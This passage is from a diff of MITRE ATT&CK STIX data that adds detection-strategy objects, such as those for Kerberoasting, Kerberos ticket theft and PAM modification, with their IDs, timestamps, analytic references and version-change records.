+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--67677c4c-5778-49eb-ae74-1920645b8554",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0060",
+                            "external_id": "DET0060"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Ingress Tool Transfers via Behavioral Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f20d9241-84cc-4393-b2fb-798241da73fa",
+                        "x-mitre-analytic--62d55c57-54a3-4c6f-8d0d-2684fa26c347",
+                        "x-mitre-analytic--56552a3e-9934-4809-97a4-67d62f29478c",
+                        "x-mitre-analytic--fac5b2df-a58d-424e-a351-7d7ca05260e8",
+                        "x-mitre-analytic--c93951a7-7f78-40cf-a891-30d6c6a9bee6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f1fe6286-1f54-4dfc-b96a-31b10711e4b1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0157",
+                            "external_id": "DET0157"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Kerberoasting Attempts (T1558.003)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ab972bf-623b-418b-9647-2c3a56b55083"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5c4334d0-cda0-4372-8572-fe2a109d39cb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0024",
+                            "external_id": "DET0024"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Kerberos Ccache File Theft or Abuse (T1558.005)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3651d7d0-dfc7-4b36-aaf2-4eb0eb39167d",
+                        "x-mitre-analytic--2a9d296d-6b36-42de-870c-9d851c0471ed"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3638f523-dc38-4ff0-8682-d2027af5bd77",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0522",
+                            "external_id": "DET0522"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Kerberos Ticket Theft or Forgery (T1558)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--685b05a6-92a3-417d-a917-8e7689e43237",
+                        "x-mitre-analytic--c101374a-ce7a-46d7-b7d4-c64fbdf1f685",
+                        "x-mitre-analytic--c08ad617-cc0d-4435-9168-08c762048503"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2db51eaa-3407-4ad0-a45e-86ebf5f2abac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0462",
+                            "external_id": "DET0462"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--eb031858-bf91-476e-8248-2c54ef0f0864"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1525b951-a0fb-42ac-97b7-05ac6f412020",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0207",
+                            "external_id": "DET0207"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect LSA Authentication Package Persistence via Registry and LSASS DLL Load",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d415367c-3624-4a68-a2b7-4734662db190"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8fb1967e-478f-4a83-9fb9-3da1015b8a26",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0047",
+                            "external_id": "DET0047"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Local Email Collection via Outlook Data File Access and Command Line Tooling",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--11cd0577-97e6-4def-a86b-fe167ae4e33d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3f27e858-2912-4b43-ac03-f668ef30c47e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0072",
+                            "external_id": "DET0072"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Logon Script Modifications and Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6dae9309-90a7-4b4e-b764-9486a7ba4390"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eccad822-4f5b-4337-8c8b-825cf617f853",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0190",
+                            "external_id": "DET0190"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect MFA Modification or Disabling Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--97cb8df9-f100-4a64-802a-1aa2f45c26eb",
+                        "x-mitre-analytic--33b7f7b2-b79c-4893-bd5c-2d5638bf5786",
+                        "x-mitre-analytic--3090db89-83c0-44bc-a17d-7cb2a6aecb87",
+                        "x-mitre-analytic--d0a9cbc4-d190-44fb-b067-27153e35dc49",
+                        "x-mitre-analytic--3a19d0ff-833f-47ae-81a0-2516e91c7b25",
+                        "x-mitre-analytic--81c940cd-633b-4f88-9f8f-f6837a7026bc",
+                        "x-mitre-analytic--1193139d-0032-4d0b-88f1-c140abe2c964"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9af47d08-fbb3-4122-8af4-74105cc23b62",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0454",
+                            "external_id": "DET0454"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Malicious Modification of Pluggable Authentication Modules (PAM)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d9c7e50d-4b13-4634-80f9-e8032a043414",
+                        "x-mitre-analytic--04cd1c76-d01d-482c-83e2-4bb5109e9764"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f722c058-8449-49ee-8e18-c3e76ec60a51",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0472",
+                            "external_id": "DET0472"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Malicious Password Filter DLL Registration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9fb6bb78-418a-483f-ae23-518ffde414d1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2556841e-474a-45c0-b827-4f5db6dcca31",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0257",
+                            "external_id": "DET0257"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Mark-of-the-Web (MOTW) Bypass via Container and Disk Image Files",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c7172412-6e48-45a0-a1c5-2eae892c1fc7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b865c4e8-f3de-471e-846c-2290b6d52da9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0589",
+                            "external_id": "DET0589"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Modification of Authentication Process via Reversible Encryption",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--105ca36e-c3e0-48c4-ada3-7f8c4aa4430f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d51dd574-9171-4c46-89bc-0e3bb1178dfe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0104",
+                            "external_id": "DET0104"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Modification of Authentication Processes Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--818b46ce-9c93-47c9-a649-8bc5d3b734a5",
+                        "x-mitre-analytic--776b9173-cbe0-4d1e-8ac9-af19b3db9dd7",
+                        "x-mitre-analytic--ee0f60f3-2fb3-4857-b02e-58c69b5aab52",
+                        "x-mitre-analytic--bbaa7fb3-974c-41ef-9cec-a0789a66445c",
+                        "x-mitre-analytic--20b6d23a-d1cc-494c-ac67-e7358835c674"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8a9ce0df-e256-4739-8db5-3e850e102e48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0272",
+                            "external_id": "DET0272"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Modification of Network Device Authentication via Patched System Images",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2f39584b-59bd-43ec-bd0a-5c2eba258ae2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7eb6ccf9-8fb5-4c7d-8a2c-33081c3ddf81",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0429",
+                            "external_id": "DET0429"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Modification of macOS Startup Items",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c46d9fac-eac9-479e-91d3-4f5a1066972d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6368178a-04c5-490b-96d5-f12dcccd0497",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0228",
+                            "external_id": "DET0228"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Multi-Stage Command and Control Channels",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f13ff1ad-5c7b-4136-b5cb-7a5663c3c54f",
+                        "x-mitre-analytic--e5fcc815-0ab4-4da9-aade-659b87d079da",
+                        "x-mitre-analytic--53ba6028-13cd-449e-aab4-d2f9fea458a4",
+                        "x-mitre-analytic--e8c91885-736e-4348-ba09-2acfbdd8b176"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
